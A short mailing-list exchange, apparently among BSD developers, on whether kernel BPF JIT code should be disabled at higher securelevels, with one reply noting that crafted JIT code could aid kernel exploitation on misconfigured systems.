Christos Zoulas wrote: > In article <20150101153259.GA2442@neva>, > Alexander Nasonov <[email protected]> wrote: > >I don't remember seeing a policy on disabling jit code at securelevel > >1 or higher. Is it something we should add? > > I am not sure that we should add it because the code it generates is tightly > conrolled by the kernel.
On a (misconfigured) system with enhanced permissions for tcpdump or for some other pcap program, one can craft a special JIT code to help them exploit a bug in the kernel: http://mainisusuallyafunction.blogspot.com/2012/11/attacking-hardened-linux-systems-with.html Function pointer of jit code is readable via kmem. Alex
